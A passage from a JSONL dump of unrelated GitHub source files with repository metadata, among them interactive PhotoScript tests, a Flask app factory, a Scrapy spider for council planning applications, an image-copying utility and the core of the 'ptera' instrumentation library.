PHOTO_FAVORITES_SET_UUID,\n PHOTO_FAVORITES_UNSET_UUID,\n PHOTOS_DICT,\n PHOTOS_FAVORITES,\n PHOTOS_FAVORITES_SET,\n PHOTOS_FILENAMES,\n PHOTOS_PLANTS,\n PHOTOS_UUID,\n PHOTOS_UUID_FILENAMES,\n SELECTION_UUIDS,\n TEST_LIBRARY,\n TEST_LIBRARY_OPEN,\n)\n\n########## Interactive tests run first ##########\n\n\ndef test_photoslibrary_open(photoslib, suspend_capture):\n test_library = copy_photos_library(photos_library=TEST_LIBRARY_OPEN, open=False)\n prompt = \"Click Switch in Photos after the drop down sheet appears.\"\n os.system(f'say \"{prompt}\"')\n with suspend_capture:\n photoslib.open(test_library)\n prompt = (\n \"Press 'y' if Photos Library contains a single image \"\n \"of a kettlebell, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n # re-copy main test library\n test_library = copy_photos_library(photos_library=TEST_LIBRARY)\n\n\ndef test_photoslibrary_import_photos_dup_check(photoslib):\n \"\"\"Attempt to import a duplicate photo with skip_duplicate_check = False\n This will cause Photos to display dialog box prompting user what to do\"\"\"\n cwd = os.getcwd()\n photo_paths = [str(pathlib.Path(cwd) / path) for path in IMPORT_PATHS]\n photoslib.import_photos(photo_paths)\n photos = list(photoslib.photos())\n assert len(photos) == NUM_PHOTOS + 1\n\n # Photos will block waiting for user to act on dialog box\n prompt = \"Click Don't Import in Photos after the drop down sheet appears.\"\n os.system(f'say \"{prompt}\"')\n photos = photoslib.import_photos(photo_paths)\n assert not photos\n photos = list(photoslib.photos())\n assert len(photos) == NUM_PHOTOS + 1\n\n\ndef test_photoslibrary_selection(photoslib, suspend_capture):\n \"\"\"Test selection. NOTE: this test requires user interaction\"\"\"\n with suspend_capture:\n photoslib.activate\n prompt = (\n \"In Photos, select the photo of the peppers \"\n \"and the photo with a face, then press Enter \"\n \"in this window.\"\n )\n os.system(f'say \"{prompt}\"')\n input(f\"\\n{prompt}\")\n\n sel = photoslib.selection\n assert len(sel) == 2\n ids = [photo.id for photo in sel]\n assert sorted(ids) == sorted(SELECTION_UUIDS)\n\n\ndef test_album_spotlight(photoslib, suspend_capture):\n \"\"\"Test Album.spotlight()\"\"\"\n with suspend_capture:\n album = photoslib.album(\"Farmers Market\")\n album.spotlight()\n prompt = (\n \"Press 'y' if the 'Farmers Market' album \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_folder_spotlight(photoslib, suspend_capture):\n \"\"\"Test Folder.spotlight()\"\"\"\n with suspend_capture:\n folder = photoslib.folder(\"Travel\")\n folder.spotlight()\n prompt = (\n \"Press 'y' if the 'Travel' folder \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_photo_spotlight(photoslib, suspend_capture):\n \"\"\"Test Photo.spotlight()\"\"\"\n with suspend_capture:\n photo = list(photoslib.photos(uuid=[PHOTO_EXPORT_UUID]))[0]\n photo.spotlight()\n prompt = (\n \"Press 'y' if the photo of the peppers \"\n \"is spotlighted in Photos, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_reset_photo_spotlight(photoslib, suspend_capture):\n \"\"\"Need to get back to Photos view for subsequent tests to work\"\"\"\n with suspend_capture:\n prompt = \"Select the 'Photos' or 'Library' view in Photos then press 'y'\"\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_album_export_photos_reveal_in_finder(photoslib, suspend_capture):\n tmpdir = tempfile.TemporaryDirectory(prefix=\"photoscript_test_\")\n album = photoslib.album(ALBUM_1_NAME)\n album.export(tmpdir.name, reveal_in_finder=True)\n with suspend_capture:\n prompt = (\n f\"Verify photos {ALBUM_1_PHOTO_EXPORT_FILENAMES} are revealed in the Finder \"\n \"by pressing 'y', otherwise, press 'n'.\"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n\n\ndef test_photo_export_reveal_in_finder(photoslib, suspend_capture):\n tmpdir = tempfile.TemporaryDirectory(prefix=\"photoscript_test_\")\n\n photo = photoscript.Photo(PHOTOS_DICT[0][\"uuid\"])\n\n exported = photo.export(tmpdir.name, reveal_in_finder=True)\n exported = [pathlib.Path(filename).name for filename in exported]\n expected = [f\"{pathlib.Path(PHOTOS_DICT[0]['filename']).stem}.jpeg\"]\n assert exported == expected\n files = os.listdir(tmpdir.name)\n assert files == expected\n with suspend_capture:\n prompt = (\n f\"Verify photo {exported} is revealed in Finder \"\n \"by pressing 'y', otherwise press 'n'.\"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n","repo_name":"RhetTbull/PhotoScript","sub_path":"tests/test_0_interactive.py","file_name":"test_0_interactive.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"76"} +{"seq_id":"25093370991","text":"ficha = dict()\nlista = list()\nlistaf = list()\nlistai = list()\ncont = 0\nsoma = 0\nwhile True:\n ficha['Nome'] = str(input('Nome: '))\n ficha['Sexo'] = str(input('Sexo [M/F]: ')).upper().strip()\n ficha['Idade'] = int(input('Idade: '))\n stop = str(input('Continuar? [S/N]'))\n lista.append(ficha.copy())\n cont += 1\n soma += ficha['Idade']\n media = soma/cont\n if ficha['Sexo'] in 'Ff':\n listaf.append(ficha['Nome'])\n if stop in 'Nn':\n break\nprint(f'Ao todo {len(lista)} pessoas foram cadastradas')\nprint(f'A média de idade dos inscritos foi {media:.2f} anos')\nprint(f'A lista de mulheres do grupo é: {listaf}')\nprint(f'A lista de pessoas mais velhas do que a média é: {listai}')\n\n\n\n","repo_name":"danpinheiro97/indices-bioestatistica","sub_path":"pythonProject/ex94.py","file_name":"ex94.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39821024286","text":"g = lambda: [*map(int, input().split())]\r\n\r\nN, K = g()\r\nnums = []\r\nfor i in range(1, N+1):\r\n tmp = g() + [i]\r\n nums.append(tmp)\r\nnums.sort()\r\nnums = nums[-K:]\r\nans = max(nums, key=lambda x: x[1])[2]\r\nprint(ans)","repo_name":"juwkim/boj","sub_path":"백준/Silver/6160. Election Time/Election Time.py","file_name":"Election Time.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10061140029","text":"from flask import Flask\nfrom flask.json import JSONEncoder\nfrom flask_cors import CORS, cross_origin\nfrom app.routes import main\nfrom app.routes import api\nfrom app.database import db\nfrom app.tools.models import States\n\n\n# http://flask.pocoo.org/snippets/119/\nclass CustomJSONEncoder(JSONEncoder):\n def default(self, obj):\n try:\n if isinstance(obj, States):\n return str(obj.value)\n iterable = iter(obj)\n except TypeError:\n pass\n else:\n return list(iterable)\n return JSONEncoder.default(self, obj)\n\n\ndef create_app(object_name):\n app = Flask(__name__)\n CORS(app)\n app.json_encoder = CustomJSONEncoder\n\n app.config.from_object(object_name)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(app)\n\n app.register_blueprint(main)\n app.register_blueprint(api, url_prefix='/api')\n\n return app\n","repo_name":"WattoolsPlus/wattools","sub_path":"server/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29527155494","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy_selenium import SeleniumRequest\nfrom scrapy.selector import Selector\nimport time\nimport datetime\n\n\nclass CumberappsSpider(scrapy.Spider):\n name = 'cumberApps'\n urls = [\n 'https://cumberland-eplanning.t1cloud.com/Pages/XC.Track/SearchApplication.aspx?d=thismonth&k=DeterminationDate&',\n 'https://cumberland-eplanning.t1cloud.com/Pages/XC.Track/SearchApplication.aspx?d=thismonth&k=LodgementDate&'\n ]\n\n def convert_dateTime(self, value):\n try:\n date_time_obj = datetime.datetime.strptime(value, '%d/%m/%Y')\n return date_time_obj.date()\n except:\n return None\n\n def remove_nonUTF_char(self, value):\n try:\n filter1 = value.replace('\\n', ' ').replace('\\r', '')\n #return bytes(filter1, 'utf-8').decode('utf-8','ignore')\n return filter1\n except:\n return None\n\n def gen_app_url(self, rel_url):\n try:\n return f\"https://cumberland-eplanning.t1cloud.com/{rel_url.strip('../..')}\"\n except:\n return None\n\n def get_applicants(self, applicant_list):\n app_list = []\n try:\n for applicant in applicant_list:\n if applicant.startswith(\"Applicant\"):\n x1 = applicant.replace('Applicant: ','')\n app_list.append(self.remove_nonUTF_char(x1))\n return f\"{','.join([str(i) for i in app_list])}\"\n except:\n return None\n\n def start_requests(self):\n yield SeleniumRequest(\n url=self.urls[0],\n wait_time=8,\n callback=self.app_listings\n )\n\n def app_listings(self, response):\n driver = response.meta['driver']\n cntr = True\n while cntr:\n time.sleep(3)\n html = driver.page_source\n response = Selector(text=html)\n\n app_listings = response.xpath(\"//div[@id='searchresult']/div[@class='result']\")\n for apps in app_listings:\n url = self.gen_app_url(apps.xpath(\".//a[@class='search']/@href\").get())\n applicant = apps.xpath(\".//div/text()\").getall()\n yield scrapy.Request(\n url=url,\n callback=self.parse,\n meta={\n 'applicant': applicant\n }\n )\n\n next_page = response.xpath(\"//a[@class='next']\")\n if next_page:\n np = driver.find_element_by_xpath(\"//a[@class='next']\")\n np.click()\n else:\n cntr = False\n\n for url in self.urls[1:]:\n yield SeleniumRequest(\n url=url,\n wait_time=8,\n callback=self.app_listings\n )\n\n def parse(self, response):\n yield{ \n 'appNum': self.remove_nonUTF_char(response.xpath(\"normalize-space(//h2/text())\").get()),\n 'nameLGA': 'Cumberland',\n 'codeLGA': '12380',\n 'address': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[@class='applicationInfoDetail']/a/text())\").get()),\n 'activity': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[text()='Description:']/following-sibling::div/text())\").get()),\n 'applicant': self.get_applicants(response.request.meta['applicant']),\n 'lodgeDate': self.convert_dateTime(response.xpath(\"normalize-space(//div[text()='Lodged date:']/following-sibling::div/text())\").get()),\n 'decisionDate': self.convert_dateTime(response.xpath(\"normalize-space(//div[text()='Decision date:']/following-sibling::div/text())\").get()),\n 'status': self.remove_nonUTF_char(response.xpath(\"normalize-space(//div[text()='Decision:']/following-sibling::div/text())\").get()),\n 'url' : response.url \n }","repo_name":"SurendraTamang/Web-Scrapping","sub_path":"UpWork_Projects/Will Farell_Spiders/cumberlandCityCouncil/cumberlandCityCouncil/spiders/cumberApps.py","file_name":"cumberApps.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30118296369","text":"# coding:utf-8 \n'''\n\n按xml文件中的文件名称,从所有图片中拷贝部分至另一个文件夹\n\ncreated on 2019/7/17\n\n@author:sunyihuan\n'''\n\nimport os\nimport shutil\nimport xml.etree.ElementTree as ET\nfrom tqdm import tqdm\n\n\nclass copy_img(object):\n '''\n 按xml文件中的文件名称,从所有图片中拷贝部分至另一个文件夹\n '''\n\n def __init__(self, xml_dir, img_orginal_dir, img_copy_dir):\n '''\n :param xml_dir: xml文件地址(全路径)\n :param img_orginal_dir: 原jpg图片地址,含即所有图片的文件夹\n :param img_copy_dir: xml文件对应jpg图片要保存的文件夹(全路径)\n '''\n self.xml_dir = xml_dir\n self.img_orginal_dir = img_orginal_dir\n self.img_copy_dir = img_copy_dir\n\n def copy_imgs(self, target_label):\n for file in tqdm(os.listdir(self.xml_dir)):\n if str(file).endswith(\"xml\"):\n xml_file = self.xml_dir + \"/\" + file\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for object1 in root.findall('object'):\n for sku in object1.findall('name'):\n label = sku.text\n if label == target_label:\n img_orginal_file = os.path.join(self.img_orginal_dir, file.split(\".\")[0] + \".jpg\")\n img_copy_file = os.path.join(self.img_copy_dir, file.split(\".\")[0] + \".jpg\")\n shutil.copy(img_orginal_file, img_copy_file)\n\n def copy_all_classes(self):\n '''\n 将所有类别,按类别分别拷入对应文件夹\n :return:\n '''\n for file in tqdm(os.listdir(self.xml_dir)):\n if str(file).endswith(\"xml\"):\n xml_file = self.xml_dir + \"/\" + file\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for object1 in root.findall('object'):\n for sku in object1.findall('name'):\n label = sku.text\n img_cop_dir = self.img_copy_dir + \"/\" + label\n if not os.path.exists(img_cop_dir): os.mkdir(img_cop_dir)\n try:\n img_orginal_file = os.path.join(self.img_orginal_dir, file.split(\".\")[0] + \".jpg\")\n img_copy_file = os.path.join(img_cop_dir, file.split(\".\")[0] + \".jpg\")\n shutil.copy(img_orginal_file, img_copy_file)\n except:\n print(file)\n\n\nif __name__ == \"__main__\":\n xml_dir = \"F:/model_data/XDSJ/all_data/20221115/Annotations\"\n img_orginal_dir = \"F:/model_data/XDSJ/all_data/20221115/JPGImages\"\n target_label=\"patchboard\"\n img_copy_dir = \"F:/model_data/XDSJ/all_data/20221115/JPGImages_{}\".format(target_label)\n if not os.path.exists(img_copy_dir): os.mkdir(img_copy_dir)\n\n ci = copy_img(xml_dir, img_orginal_dir, img_copy_dir)\n ci.copy_imgs(target_label)\n","repo_name":"sunyihuan326/JY_detection","sub_path":"data_script/copy_img/copy_imgs_from_xmlname.py","file_name":"copy_imgs_from_xmlname.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39738793541","text":"base_responses = {\n 400: {\"description\": \"Bad Request\"},\n 404: {\"description\": \"Not Found\"},\n 422: {\"description\": \"Validation Error\"},\n 500: {\"description\": \"Internal Server Error\"}\n}\n\ngeneral_responses = {\n **base_responses,\n 200: {\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Success\"\n }\n }\n },\n }\n}\n","repo_name":"Tanmay000009/StoreMonitor","sub_path":"src/schemas/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74069118964","text":"import functools\nimport inspect\nfrom collections import defaultdict\nfrom contextlib import contextmanager\nfrom contextvars import ContextVar\nfrom copy import copy\nfrom itertools import chain, count\n\nfrom .categories import match_category\nfrom .selector import to_pattern\nfrom .selfless import Selfless, choose, override\nfrom .utils import ABSENT, ACTIVE, COMPLETE, FAILED, call_with_captures, setvar\n\n_cnt = count()\n\n\nclass Frame:\n\n top = ContextVar(\"Frame.top\", default=None)\n\n def __init__(self, fname):\n self.function_name = fname\n self.accumulators = defaultdict(list)\n self.to_close = []\n\n def register(self, acc, captures, close_at_exit):\n for cap in captures:\n self.accumulators[cap.name].append((cap, acc))\n if close_at_exit:\n self.to_close.append(acc)\n\n def get_accumulators(self, varname):\n return chain(self.accumulators[varname], self.accumulators[None])\n\n def run(self, method, varname, category, value=ABSENT, mayfail=True):\n rval = ABSENT\n for element, acc in self.get_accumulators(varname):\n acc = acc.match(element, varname, category, value, mayfail=mayfail)\n if acc:\n tmp = getattr(acc, method)(element, varname, category, value)\n if tmp is not ABSENT:\n rval = tmp\n return rval\n\n def set(self, varname, key, category, value):\n self.run(\"varset\", varname, category, value)\n\n def get(self, varname, key, category):\n rval = self.run(\"varget\", varname, category, mayfail=False)\n if rval is ABSENT:\n raise NameError(f\"Cannot get value for variable `{varname}`\")\n return rval\n\n def exit(self):\n for acc in self.to_close:\n acc.close()\n\n\nclass Capture:\n def __init__(self, element):\n self.element = element\n self.capture = element.capture\n self.names = []\n self.values = []\n\n @property\n def name(self):\n if self.element.name is not None:\n return self.element.name\n if len(self.names) == 0:\n raise ValueError(f\"No name for capture `{self.capture}`\")\n if len(self.names) > 1:\n raise ValueError(\n f\"Multiple names stored for capture `{self.capture}`\"\n )\n return self.names[0]\n\n @property\n def value(self):\n if len(self.values) == 0:\n raise ValueError(f\"No value for capture `{self.capture}`\")\n if len(self.values) > 1:\n raise ValueError(\n f\"Multiple values stored for capture `{self.capture}`\"\n )\n return self.values[0]\n\n def nomatch(self):\n return None if self.element.name is None else False\n\n def check(self, varname, category, value):\n el = self.element\n assert el.name is None or varname == el.name\n if not match_category(el.category, category, value):\n return self.nomatch()\n elif el.value is not ABSENT and el.value != value:\n return self.nomatch()\n else:\n return True\n\n def acquire(self, varname, value):\n assert varname is not None\n self.names.append(varname)\n self.values.append(value)\n\n def __str__(self):\n return f\"Capture({self.element}, {self.names}, {self.values})\"\n\n __repr__ = __str__\n\n\nclass Accumulator:\n def __init__(\n self,\n names,\n parent=None,\n rules=None,\n template=True,\n pattern=None,\n focus=True,\n ):\n self.id = next(_cnt)\n self.names = set(names)\n self.pattern = pattern\n self.parent = parent\n self.children = []\n self.rules = rules or defaultdict(list)\n self.captures = {}\n self.status = ACTIVE\n self.template = template\n self.focus = focus\n if self.parent is not None:\n self.parent.children.append(self)\n\n def getcap(self, element):\n if element.capture not in self.captures:\n cap = Capture(element)\n self.captures[element.capture] = cap\n return self.captures[element.capture]\n\n def fail(self):\n self.status = FAILED\n for leaf in self.leaves():\n leaf.status = FAILED\n\n def match(self, element, varname, category, value, mayfail=True):\n if self.status is FAILED:\n return None\n if element.focus:\n acc = self.fork()\n else:\n acc = self\n cap = acc.getcap(element)\n status = cap.check(varname, category, value)\n if status is True:\n return acc\n elif status is False:\n if mayfail:\n self.fail()\n return None\n else:\n return None\n\n def varset(self, element, varname, category, value):\n if self.status is FAILED:\n return\n cap = self.getcap(element)\n cap.acquire(varname, value)\n\n def varget(self, element, varname, category, _):\n if not element.focus or self.status is FAILED:\n return ABSENT\n cap = self.getcap(element)\n cap.names.append(varname)\n rval = self.run(\"value\", may_fail=False)\n if rval is ABSENT:\n cap.names.pop()\n else:\n cap.values.append(rval)\n return rval\n\n def build(self):\n rval = {}\n curr = self\n while curr:\n rval.update(\n {\n name: cap\n for name, cap in curr.captures.items()\n if (cap.values or cap.names) and name is not None\n }\n )\n curr = curr.parent\n return rval\n\n def run(self, rulename, may_fail):\n if self.status is FAILED:\n return FAILED\n rval = ABSENT\n for fn in self.rules[rulename]:\n args = self.build()\n _, names = get_names(fn)\n if may_fail and set(args) != set(names):\n return ABSENT\n else:\n rval = fn(**args)\n return rval\n\n def merge(self, child):\n for name, cap in child.captures.items():\n mycap = self.getcap(cap.element)\n mycap.names += cap.names\n mycap.values += cap.values\n\n def leaves(self):\n if not self.children and self.focus:\n return [self]\n else:\n rval = []\n for child in self.children:\n rval += child.leaves()\n return rval\n\n def _to_merge(self):\n rval = []\n for child in self.children:\n if not child.focus:\n rval.append(child)\n rval += child._to_merge()\n return rval\n\n def close(self):\n if self.status is ACTIVE:\n if self.parent is None:\n for acc in self._to_merge():\n self.merge(acc)\n leaves = self.leaves()\n for leaf in leaves:\n leaf.run(\"listeners\", may_fail=True)\n if not leaves:\n self.run(\"listeners\", may_fail=True)\n self.status = COMPLETE\n\n def fork(self, focus=True):\n parent = None if self.template else self\n return Accumulator(\n self.names,\n parent,\n rules=self.rules,\n template=False,\n pattern=self.pattern,\n focus=focus,\n )\n\n def __str__(self):\n rval = str(self.id)\n curr = self.parent\n while curr:\n rval = f\"{curr.id} > {rval}\"\n curr = curr.parent\n return f\"Accumulator({self.pattern}, {rval})\"\n\n\ndef get_names(fn):\n if hasattr(fn, \"_ptera_argspec\"):\n return fn._ptera_argspec\n else:\n spec = inspect.getfullargspec(fn)\n if spec.args and spec.args[0] == \"self\":\n return None, spec.args[1:]\n else:\n return None, spec.args\n\n\ndef dict_to_collection(*rulesets):\n tmp = {}\n for rules in rulesets:\n for pattern, triggers in rules.items():\n pattern = to_pattern(pattern)\n for name, entries in triggers.items():\n if not isinstance(entries, (tuple, list)):\n entries = [entries]\n for entry in entries:\n focus, names = get_names(entry)\n this_pattern = pattern.rewrite(names, focus=focus)\n if this_pattern not in tmp:\n tmp[this_pattern] = Accumulator(\n names, pattern=this_pattern\n )\n acc = tmp[this_pattern]\n acc.rules[name].append(entry)\n return PatternCollection(list(tmp.items()))\n\n\nclass PatternCollection:\n current = ContextVar(\"PatternCollection.current\", default=None)\n\n def __init__(self, patterns=None):\n self.patterns = patterns or []\n\n def proceed(self, fname, frame):\n next_patterns = []\n to_process = list(self.patterns)\n while to_process:\n pattern, acc = to_process.pop()\n ename = pattern.element.name\n if not pattern.immediate:\n next_patterns.append((pattern, acc))\n if ename is None or ename == fname:\n is_template = acc.template\n acc = acc.fork(focus=pattern.focus or is_template)\n frame.register(acc, pattern.captures, close_at_exit=is_template)\n for child in pattern.children:\n if child.collapse:\n to_process.append((child, acc))\n else:\n next_patterns.append((child, acc))\n rval = PatternCollection(next_patterns)\n return rval\n\n def show(self):\n for pattern, acc in self.patterns:\n print(pattern.encode(), \"\\t\", acc)\n\n\n@contextmanager\ndef newframe():\n frame = Frame(None)\n try:\n with setvar(Frame.top, frame):\n yield frame\n finally:\n frame.exit()\n\n\n@contextmanager\ndef proceed(fname):\n curr = PatternCollection.current.get()\n frame = Frame.top.get()\n if curr is None:\n yield None\n else:\n new = curr.proceed(fname, frame)\n with setvar(PatternCollection.current, new):\n yield new\n\n\n@contextmanager\ndef overlay(*rulesets):\n rulesets = [rules for rules in rulesets if rules]\n\n if not rulesets:\n yield None\n\n else:\n collection = dict_to_collection(*rulesets)\n curr = PatternCollection.current.get()\n if curr is not None:\n collection.patterns = curr.patterns + collection.patterns\n with setvar(PatternCollection.current, collection):\n yield collection\n\n\ndef interact(sym, key, category, __self__, value):\n from_state = __self__.get(sym)\n\n if key is None:\n fr = Frame.top.get()\n try:\n fr_value = fr.get(sym, key, category)\n except NameError:\n fr_value = ABSENT\n success, value = choose([value, fr_value, from_state])\n if not success:\n raise NameError(f\"Variable {sym} of {__self__} is not set.\")\n fr.set(sym, key, category, value)\n return value\n\n else:\n assert value is not ABSENT\n with newframe():\n with proceed(sym):\n interact(\"#key\", None, None, __self__, key)\n # TODO: merge the return value of interact (currently raises\n # ConflictError)\n interact(\"#value\", None, category, __self__, value)\n success, value = choose([value, from_state])\n if not success:\n raise NameError(f\"Variable {sym} of {__self__} is not set.\")\n return value\n\n\nclass Collector:\n def __init__(self, pattern, finalize=None):\n self.data = []\n self.pattern = to_pattern(pattern)\n self.finalizer = finalize\n\n def listener(**kwargs):\n self.data.append(kwargs)\n\n listener._ptera_argspec = None, set(self.pattern.all_captures())\n self._listener = listener\n\n def __iter__(self):\n return iter(self.data)\n\n def _map_helper(self, args, transform_all, transform_one):\n if not args:\n return transform_all(self)\n elif isinstance(args[0], str):\n assert all(isinstance(arg, str) for arg in args)\n results = tuple(\n [transform_one(entry[arg]) for entry in self] for arg in args\n )\n if len(args) == 1:\n return results[0]\n else:\n return list(zip(*results))\n else:\n assert len(args) == 1\n (fn,) = args\n return [\n call_with_captures(fn, entry) for entry in transform_all(self)\n ]\n\n def map(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: [\n {key: cap.value for key, cap in entry.items()} for entry in self\n ],\n transform_one=lambda entry: entry.value,\n )\n\n def map_all(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: [\n {key: cap.values for key, cap in entry.items()}\n for entry in self\n ],\n transform_one=lambda entry: entry.values,\n )\n\n def map_full(self, *args):\n return self._map_helper(\n args=args,\n transform_all=lambda self: self,\n transform_one=lambda entry: entry,\n )\n\n def rules(self):\n return {self.pattern: {\"listeners\": [self._listener]}}\n\n def finalize(self):\n if self.finalizer:\n return self.finalizer(self)\n else:\n return self\n\n\nclass Tap:\n hasoutput = True\n\n def __init__(self, selector, finalize=None):\n self.selector = selector\n self.finalize = finalize\n\n def hook(self, finalize):\n self.finalize = finalize\n return self\n\n def instantiate(self):\n return Collector(self.selector, self.finalize)\n\n\nclass CallResults:\n def __init__(self, value):\n self.value = value\n setattr(self, \"0\", self.value)\n\n def __getitem__(self, item):\n if isinstance(item, int):\n item = str(item)\n try:\n return getattr(self, item)\n except AttributeError:\n raise IndexError(item)\n\n\nclass StateOverlay:\n hasoutput = False\n\n def __init__(self, values):\n self._rules = {patt: {\"value\": value} for patt, value in values.items()}\n\n def rules(self):\n return self._rules\n\n def instantiate(self):\n return self\n\n def finalize(self):\n return self\n\n\ndef _to_plugin(spec):\n return Tap(spec) if isinstance(spec, str) else spec\n\n\ndef _collect_plugins(plugins, kwplugins):\n plugins = {str(i + 1): p for i, p in enumerate(plugins)}\n plugins.update(kwplugins)\n plugins = {name: _to_plugin(p) for name, p in plugins.items()}\n return plugins, any(p.hasoutput for name, p in plugins.items())\n\n\nclass PteraFunction(Selfless):\n def __init__(\n self, fn, state, callkey=None, plugins=None, return_object=False\n ):\n super().__init__(fn, state)\n self.callkey = callkey\n self.plugins = plugins or {}\n self.return_object = return_object\n\n def clone(self, **kwargs):\n kwargs = {\n \"fn\": self.fn,\n \"state\": copy(self.state),\n \"callkey\": self.callkey,\n \"plugins\": self.plugins,\n \"return_object\": self.return_object,\n **kwargs,\n }\n return type(self)(**kwargs)\n\n def __getitem__(self, callkey):\n assert self.callkey is None\n return self.clone(callkey=callkey)\n\n def tweak(self, values, priority=2):\n values = {\n k: lambda __v=v, **_: override(__v, priority)\n for k, v in values.items()\n }\n return self.using(StateOverlay(values))\n\n def rewrite(self, values, full=False, priority=2):\n def _wrapfn(fn, full=True):\n @functools.wraps(fn)\n def newfn(**kwargs):\n return override(\n call_with_captures(fn, kwargs, full=full), priority=priority\n )\n\n newfn._ptera_argspec = get_names(fn)\n return newfn\n\n values = {k: _wrapfn(v, full=full) for k, v in values.items()}\n return self.using(StateOverlay(values))\n\n def using(self, *plugins, **kwplugins):\n plugins, return_object = _collect_plugins(plugins, kwplugins)\n return self.clone(\n plugins={**self.plugins, **plugins}, return_object=return_object,\n )\n\n def use(self, *plugins, **kwplugins):\n plugins, _ = _collect_plugins(plugins, kwplugins)\n self.plugins.update(plugins)\n return self\n\n def collect(self, query):\n plugin = _to_plugin(query)\n\n def deco(fn):\n self.plugins[fn.__name__] = plugin.hook(fn)\n\n return deco\n\n def on(self, query, full=False, all=False):\n plugin = _to_plugin(query)\n\n def deco(fn):\n def finalize(coll):\n if full:\n return coll.map_full(fn)\n elif all:\n return coll.map_all(fn)\n else:\n return coll.map(fn)\n\n self.plugins[fn.__name__] = plugin.hook(finalize)\n\n return deco\n\n def __call__(self, *args, **kwargs):\n rulesets = []\n with newframe():\n plugins = {\n name: p.instantiate() for name, p in self.plugins.items()\n }\n for plugin in plugins.values():\n rulesets.append(plugin.rules())\n with overlay(*rulesets):\n with proceed(self.fn.__name__):\n if self.callkey is not None:\n interact(\"#key\", None, None, self, self.callkey)\n rval = super().__call__(*args, **kwargs)\n\n callres = CallResults(rval)\n for name, plugin in plugins.items():\n setattr(callres, name, plugin.finalize())\n\n if self.return_object:\n return callres\n else:\n return rval\n","repo_name":"breuleux/orig-ptera","sub_path":"ptera/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":18295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20167098745","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\norignal=cv.imread('pic1.jpg',0)\r\nMask_app=cv.imread('Segmented Image.jpg',0)\r\nrows=Mask_app.shape[0]\r\ncols=Mask_app.shape[1]\r\nfor i in range(rows):\r\n for j in range(cols):\r\n if Mask_app[i][j]==0:\r\n Mask_app[i][j]=255\r\n else:\r\n Mask_app[i][j] = 0\r\n\r\n\r\nwidth = 450\r\nheight = 450\r\ndim = (width, height)\r\n\r\n# resize image\r\norig= cv.resize(orignal, dim, interpolation=cv.INTER_AREA)\r\ncv.imshow('orig', orig)\r\n\r\nkernel = np.array([[0, -1, 0],\r\n [-1, 5,-1],\r\n [0, -1, 0]])\r\nimage_sharp = cv.filter2D(src=orig, ddepth=-1, kernel=kernel)\r\ncv.imshow('orig_sharp', image_sharp)\r\n\r\n\r\nMask=cv.bitwise_and(orig,Mask_app)\r\ncv.imshow('mask', Mask)\r\ncv.waitKey(0)","repo_name":"NimraAkmal/DIP-Project","sub_path":"Segmentation(3).py","file_name":"Segmentation(3).py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"2118234392","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n# *****************************************************************\n# ** PTS -- Python Toolkit for working with SKIRT **\n# ** © Astronomical Observatory, Ghent University **\n# *****************************************************************\n\n## \\package pts.modeling.html.all Contains the AllPagesGenerator class.\n\n# -----------------------------------------------------------------\n\n# Ensure Python 3 compatibility\nfrom __future__ import absolute_import, division, print_function\n\n# Import the relevant PTS classes and modules\nfrom pts.modeling.html.index import IndexPageGenerator\nfrom pts.modeling.html.status import StatusPageGenerator\nfrom pts.modeling.html.data import DataPageGenerator\nfrom pts.modeling.html.preparation import PreparationPageGenerator\nfrom pts.modeling.html.components import ComponentsPageGenerator\nfrom pts.modeling.html.photometry import PhotometryPageGenerator\nfrom pts.modeling.html.maps import MapsPageGenerator\nfrom pts.modeling.html.model import ModelPageGenerator\nfrom pts.modeling.html.fitting import FittingPageGenerator\nfrom 